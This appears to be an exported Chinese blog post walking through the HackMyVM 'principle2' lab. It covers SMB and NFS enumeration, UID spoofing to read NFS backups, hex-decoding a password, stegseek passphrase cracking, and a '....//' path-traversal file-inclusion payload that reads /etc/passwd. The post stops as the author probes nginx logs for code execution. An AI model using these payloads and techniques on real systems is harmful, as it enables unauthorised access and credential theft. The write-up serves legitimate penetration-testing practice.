{"id":493,"date":"2024-04-03T15:03:02","date_gmt":"2024-04-03T07:03:02","guid":{"rendered":"http:\/\/162.14.82.114\/?p=493"},"modified":"2024-04-03T15:03:02","modified_gmt":"2024-04-03T07:03:02","slug":"hmv-_-principle2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/493\/04\/03\/2024\/","title":{"rendered":"hmv[-_-]principle2"},"content":{"rendered":"<h1>principle2<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502128.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502128.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403123736335\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.4 -- -A<\/code><\/pre>\n<pre><code class=\"language-css\">Open 172.20.10.4:80\nOpen 172.20.10.4:111\nOpen 172.20.10.4:139\nOpen 172.20.10.4:445\nOpen 172.20.10.4:2049\nOpen 172.20.10.4:36991\nOpen 172.20.10.4:42969\nOpen 172.20.10.4:43405\nOpen 172.20.10.4:47173\nOpen 172.20.10.4:51017\n\nPORT      STATE SERVICE     REASON  VERSION\n80\/tcp    open  http        syn-ack nginx 1.22.1\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.22.1\n111\/tcp   open  rpcbind     syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100003  3,4         2049\/tcp   nfs\n|   100003  3,4         2049\/tcp6  nfs\n|   100005  1,2,3      42969\/tcp   mountd\n|   100005  1,2,3      47173\/udp6  mountd\n|   100005  1,2,3      55329\/tcp6  mountd\n|   100005  1,2,3      56240\/udp   mountd\n|   100021  1,3,4      40308\/udp6  nlockmgr\n|   100021  1,3,4      43405\/tcp   nlockmgr\n|   100021  1,3,4      44207\/tcp6  nlockmgr\n|   100021  1,3,4      55257\/udp   nlockmgr\n|   100024  1          33514\/udp   status\n|   100024  1          36529\/tcp6  status\n|   100024  1          51017\/tcp   status\n|   100024  1          54890\/udp6  status\n|   100227  3           2049\/tcp   nfs_acl\n|_  100227  3           2049\/tcp6  nfs_acl\n139\/tcp   open  netbios-ssn syn-ack Samba smbd 4.6.2\n445\/tcp   open  netbios-ssn syn-ack Samba smbd 4.6.2\n2049\/tcp  open  nfs_acl     syn-ack 3 (RPC #100227)\n36991\/tcp open  mountd      syn-ack 1-3 (RPC #100005)\n42969\/tcp open  mountd      syn-ack 1-3 (RPC #100005)\n43405\/tcp open  nlockmgr    syn-ack 1-4 (RPC #100021)\n47173\/tcp open  mountd      syn-ack 1-3 (RPC #100005)\n51017\/tcp open  status      syn-ack 1 (RPC #100024)\n\nHost script results:\n| smb2-time: \n|   date: 2024-04-03T04:39:19\n|_  start_date: N\/A\n|_clock-skew: -1s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 45452\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 15726\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 7756\/udp): CLEAN (Failed to receive data)\n|   Check 4 (port 59594\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.4\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n<p>\u5565\u90fd\u6ca1\u626b\u51fa\u6765\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502131.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502131.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403124205383\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502132.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502132.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403124218677\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u80fd\u9700\u8981\u8fdb\u884cdns\u89e3\u6790\uff0c\u5148\u6401\u7f6e\u3002<\/p>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.4<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.4\n+ Target Hostname:    172.20.10.4\n+ Target Port:        80\n+ Start Time:         2024-04-03 00:40:18 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.22.1\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-03 00:40:32 (GMT-4) (14 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u67e5\u770b\u654f\u611f\u7aef\u53e3<\/h3>\n<h4>SMB<\/h4>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86smb\u670d\u52a1\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">smbmap -H 172.20.10.4  <\/code><\/pre>\n<pre><code class=\"language-css\">[+] IP: 172.20.10.4:445 Name: 172.20.10.4               Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        public                                                  READ ONLY       New Jerusalem Public\n        hermanubis                                              NO ACCESS       Hermanubis share\n        IPC$                                                    NO ACCESS       IPC Service (Samba 4.17.12-Debian)<\/code><\/pre>\n<p>\u6709\u4e00\u4e2a\u53ea\u8bfb\u6587\u4ef6\uff0c\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">smbclient \/\/172.20.10.4\/public<\/code><\/pre>\n<pre><code class=\"language-text\">smb: \\&gt; ls\n  .                                   D        0  Tue Nov 28 06:57:45 2023\n  ..                                  D        0  Sat Nov 25 11:19:40 2023\n  new_era.txt                         N      158  Sun Nov 19 07:01:00 2023\n  straton.txt                         N      718  Sun Nov 19 07:00:24 2023\n  loyalty.txt                         N      931  Sun Nov 19 07:01:07 2023\n\n                19962704 blocks of size 1024. 17193612 blocks available\nsmb: \\&gt; get new_era.txt \ngetting file \\new_era.txt of size 158 as new_era.txt (1.6 KiloBytes\/sec) (average 1.6 KiloBytes\/sec)\nsmb: \\&gt; get straton.txt \ngetting file \\straton.txt of size 718 as straton.txt (6.7 KiloBytes\/sec) (average 4.2 KiloBytes\/sec)\nsmb: \\&gt; get loyalty.txt \ngetting file \\loyalty.txt of size 931 as loyalty.txt (303.1 KiloBytes\/sec) (average 8.5 KiloBytes\/sec)\nsmb: \\&gt; pwd\nCurrent directory is \\\\172.20.10.4\\public\\<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u51e0\u4e2a\u6587\u4ef6\u7684\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-text\"># loyalty.txt\nThis text was the source of considerable controversy in a debate between Byron (7) and Hermanubis (452).\n\nWhat I propose, then, is that we are not born as entirely free agents, responsible only for ourselves. The very core of what we are, our sentience, separates us from and elevates us above the animal kingdom. As I have argued, this is not a matter of arrogance, but of responsibility.\n\n2257686f2061726520796f752c207468656e3f22\n\nTo put it simply: each of us owes a burden of loyalty to humanity itself, to the human project across time and space. This is not a minor matter, or some abstract issue for philosophers. It is a profound and significant part of every human life. It is a universal source of meaning and insight that can bind us together and set us on a path for a brighter future; and it is also a division, a line that must held against those who preach the gospel of self-annihilation. We ignore it at our peril.\n\n# cat new_era.txt \nYesterday there was a big change, new government, new mayor. All citizens were reassigned their tasks. For security, every user should change their password.\n\n# cat straton.txt\nThis fragment from Straton&#039;s On the Universe appears to have been of great significance both to the Progenitor and to the Founder.\n\nAMYNTAS:        But what does this tell us about the nature of the universe, which is what we were discussing?\nSTRATON:        That is the next question we must undertake to answer. We begin with the self because that is what determines our existence as individuals; but the self cannot exist without that which surrounds it. The citizen lives within the city; and the city lives within the cosmos. So now we must apply the principle we have discovered to the wider world, and ask: if man is like a machine, could it be that the universe is similar in nature? And if so, what follows from that fact?<\/code><\/pre>\n<p>\u9664\u4e86\u90a3\u4e00\u4e32\u5b57\u7b26\uff0c\u4f3c\u4e4e\u5bf9\u6211\u4eec\u7684\u6253\u9776\u6ca1\u6709\u5565\u7528\u5904\uff0c\u57fa\u672c\u90fd\u662f\u54f2\u5b66\u89c2\u5ff5\uff0c\u4e0d\u8fc7\u5148\u8bb0\u4f4f\u4ed6\u4eec\u5927\u6982\u8bf4\u7684\u662f\u5565\u5427\u3002<\/p>\n<h4>NFS<\/h4>\n<p>\u53ef\u4ee5\u770b\u5230\u8fd8\u5f00\u542f\u4e86NFS\u670d\u52a1\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">showmount -e 172.20.10.4\n\nExport list for 172.20.10.4:\n\/var\/backups *\n\/home\/byron  *<\/code><\/pre>\n<p>\u521b\u5efa\u4e24\u4e2a\u6587\u4ef6\u5939\uff0c\u7136\u540e\u6302\u8f7d\u5230\u672c\u5730\uff1a<\/p>\n<pre><code class=\"language-bash\">mount -t nfs 172.20.10.4:\/var\/backups \/home\/kali\/temp\/principle2\/backups\nmount -t nfs 172.20.10.4:\/home\/byron \/home\/kali\/temp\/principle2\/byron<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n<pre><code class=\"language-text\">chmod: changing permissions of &#039;backups&#039;: Read-only file system\ncd: permission denied: backups<\/code><\/pre>\n<pre><code class=\"language-text\"># mayor.txt \nNow that I am mayor, I think Hermanubis is conspiring against me, I guess he has a secret group and is hiding it.\n# memory.txt \nHermanubis told me that he lost his password and couldn&#039;t change it, thank goodness I keep a record of each neighbor with their number and password in hexadecimal. I think he would be a good mayor of the New Jerusalem.<\/code><\/pre>\n<p>\u4f7f\u752816\u8fdb\u5236\u52a0\u5bc6\u4e86\u5bc6\u7801\uff0c\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e24\u4e2a\u6587\u4ef6\u6240\u6709\u8005\u7684UID\uff1a<\/p>\n<pre><code class=\"language-bash\">ls -la\ntotal 44\ndrwxr-xr-x  4 kali kali    4096 Apr  3 01:01 .\ndrwxr-xr-x 11 kali kali    4096 Apr  3 00:56 ..\ndrwxr--r--  2   54 backup 28672 Nov 28 19:00 backups\ndrwxr-xr-x  3 1001   1001  4096 Nov 25 12:33 byron<\/code><\/pre>\n<p>\u521b\u5efa\u5177\u6709\u76f8\u540cUID\u7684\u7528\u6237\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-bash\">useradd -u 54 hack\nuseradd warning: hack&#039;s uid 54 outside of the UID_MIN 1000 and UID_MAX 60000 range.<\/code><\/pre>\n<p>\u5207\u6362\u7528\u6237\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-bash\">su hack\nbash\ncd backups\nls<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502133.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502133.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403131108843\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u64e6\uff0c\u770b\u4e00\u4e0b\u5185\u5bb9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502134.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502134.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403131453924\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u679c\u7136\u90fd\u662f\u5341\u516d\u8fdb\u5236\u7684\u5185\u5bb9\uff0c\u8f93\u5165\u5230\u4e00\u4e2a\u6587\u4ef6\u4e2d\u65b9\u4fbf\u6211\u4eec\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n<pre><code class=\"language-bash\">cat *.txt &gt;&gt; \/tmp\/hex.txt\nsu kali\nmv \/tmp\/hex.txt \/home\/kali\/temp\/principle2\/hex.txt<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7834\u8bd1\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">while read line; do echo &quot;$line&quot; | xxd -ps -r | strings; done &lt; hex.txt<\/code><\/pre>\n<p>\u8fd9\u4e9b\u884c\u5927\u591a\u6570\u662f\u65e0\u610f\u4e49\u7684\uff0c\u53ea\u6709\u4e00\u4e2a\uff1a<\/p>\n<pre><code class=\"language-text\">.......\nByronIsAsshole\n.......<\/code><\/pre>\n<p>\u8fd9\u5c31\u662f\u5bc6\u7801\u4e86\uff0c\u53ef\u60dc\u6ca1\u6709\u5f00\u653e22\u7aef\u53e3\uff0c\u4e0d\u7136\u76f4\u63a5ssh\u8fde\u63a5\u4e86\uff0c\u91cd\u65b0\u8fde\u63a5smb\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-bash\">smbmap -H 172.20.10.4 -u hermanubis -p ByronIsAsshole<\/code><\/pre>\n<pre><code class=\"language-css\">[+] IP: 172.20.10.4:445 Name: 172.20.10.4               Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        public                                                  READ ONLY       New Jerusalem Public\n        hermanubis                                              READ ONLY       Hermanubis share\n        IPC$                                                    NO ACCESS       IPC Service (Samba 4.17.12-Debian)<\/code><\/pre>\n<p>\u8bfb\u53d6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">smbclient \/\/172.20.10.4\/hermanubis -U hermanubis\nPassword for [WORKGROUP\\hermanubis]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Tue Nov 28 09:44:44 2023\n  ..                                  D        0  Tue Nov 28 20:13:50 2023\n  index.html                          N      346  Tue Nov 28 09:44:41 2023\n  prometheus.jpg                      N   307344  Tue Nov 28 12:23:24 2023\n\n                19962704 blocks of size 1024. 17193608 blocks available\nsmb: \\&gt; get index.html \ngetting file \\index.html of size 346 as index.html (13.0 KiloBytes\/sec) (average 13.0 KiloBytes\/sec)\nsmb: \\&gt; get prometheus.jpg \ngetting file \\prometheus.jpg of size 307344 as prometheus.jpg (10719.3 KiloBytes\/sec) (average 5564.4 KiloBytes\/sec)<\/code><\/pre>\n<h4>\u7206\u7834\u9690\u85cf\u5185\u5bb9<\/h4>\n<p>\u770b\u770b\u4ec0\u4e48\u9b3c\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;es&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Welcome to the resistance forum&lt;\/title&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;h1&gt;Welcome to the resistance forum&lt;\/h1&gt;\n    &lt;p&gt;free our chains!&lt;\/p&gt;\n    &lt;img src=&quot;prometheus.jpg&quot; alt=&quot;chained&quot;&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502135.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502135.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403133248650\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u53bb\u770b\u770b\u6709\u6ca1\u6709\u5305\u542b\u5565\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">steghide extract -sf prometheus.jpg \nEnter passphrase: \nsteghide: could not extract any data with that passphrase!<\/code><\/pre>\n<p>\u6709\u5bc6\u7801\u770b\u6765\u662f\u9700\u8981\u8fdb\u884c\u63d0\u53d6\u7684\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">stegseek -wl \/usr\/share\/wordlists\/rockyou.txt prometheus.jpg<\/code><\/pre>\n<pre><code class=\"language-text\">StegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: &quot;soldierofanubis&quot;  \n[i] Original filename: &quot;secret.txt&quot;.\n[i] Extracting to &quot;prometheus.jpg.out&quot;.<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">cat prometheus.jpg.out \nI have set up a website to dismantle all the lies they tell us about the city: thetruthoftalos.hmv<\/code><\/pre>\n<h3>\u6dfb\u52a0dns\u89e3\u6790<\/h3>\n<pre><code class=\"language-apl\"># \/etc\/hosts\n172.20.10.4     thetruthoftalos.hmv<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">curl http:\/\/thetruthoftalos.hmv\/\nNOTHING<\/code><\/pre>\n<p>\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">dirsearch -u http:\/\/thetruthoftalos.hmv\/<\/code><\/pre>\n<pre><code class=\"language-css\">[01:47:04] 200 -    2KB - \/index.php\n[01:47:17] 403 -  555B  - \/uploads\/\n[01:47:17] 301 -  169B  - \/uploads  -&gt;  http:\/\/thetruthoftalos.hmv\/uploads\/<\/code><\/pre>\n<p>ok\uff01\uff01\uff01\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502136.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502136.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403134804404\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">Content of ares.txt:\n\nRoman Name: Mars\n\nAres was the god of war. He was depicted as both cruel and a coward, but greatly feared among the Greek populace for his battle lust and violence. Despite his reputation for violence, Ares was not always respected by the other gods and was often the subject of ridicule and scorn. Ares was the son of Zeus and Hera, but neither of his parents liked him which often made him feel outcast by the Olympians, apart from Aphrodite, with whom he carried on a lengthy affair. His symbols include the vulture and the dog, and he often carried a bloody spear.<\/code><\/pre>\n<pre><code class=\"language-text\">Content of hermes.txt:\n\nRoman Name: Mercury\n\nHermes was the messenger of the gods, a trickster, and a friend to thieves. He was said to have invented boxing and gymnastics and was the son of Zeus and the constellation Maia. He was often depicted as a young man wearing a winged hat and sandals, and carrying a caduceus: a staff with two snakes coiled around it. Hermes was known for his quick wit, cunning, and ability to move swiftly between the mortal and divine worlds. He was also considered the messenger of the gods, and was responsible for delivering missives and guiding souls to the underworld. In addition, Hermes was associated with luck and good fortune, and was often invoked by merchants and traders for success in their endeavors. Hermes was also known to be one of the most mischievous of the gods, often playing tricks and pranks on other Olympians, demigods like Heracles, and the mere mortals of Greece.<\/code><\/pre>\n<p>\u50cf\u662f\u4e00\u4e2a\u5bfc\u6e38\u9875\u9762\u4e00\u6837\u3002\u770b\u4e00\u4e0burl\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/thetruthoftalos.hmv\/index.php?filename=hermes.txt<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n<pre><code>http:\/\/thetruthoftalos.hmv\/index.php?filename=..\/..\/..\/..\/..\/..\/etc\/passwd\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/etc\/passwd<\/code><\/pre>\n<p>\u7b2c\u4e8c\u4e2a\u6210\u529f\u4e86\uff0c\u627e\u51fa\u4e86\u51e0\u4e2a\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:54:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\ntalos:x:1000:1000:Talos,,,:\/home\/talos:\/bin\/bash\n_rpc:x:102:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:103:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\nbyron:x:1001:1001::\/home\/byron:\/bin\/sh\nhermanubis:x:1002:1002::\/home\/hermanubis:\/bin\/sh\nmelville:x:1003:1003::\/home\/melville:\/bin\/bash<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u6709\u4e0a\u4f20\u70b9\uff0c\u627e\u4e00\u4e0b\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8fdb\u884c\u65e5\u5fd7\u5305\u542bgetshell\uff1a<\/p>\n<pre><code class=\"language-text\">http:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/apache\/access.log\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/nginx\/access.log\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/nginx\/error.log<\/code><\/pre>\n<p>\u7b2c\u4e8c\u4e2a\u51fa\u73b0\u4ee5\u4e0b\u60c5\u51b5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502137.png'><img class=\"lazyload lazyload-style-2\" 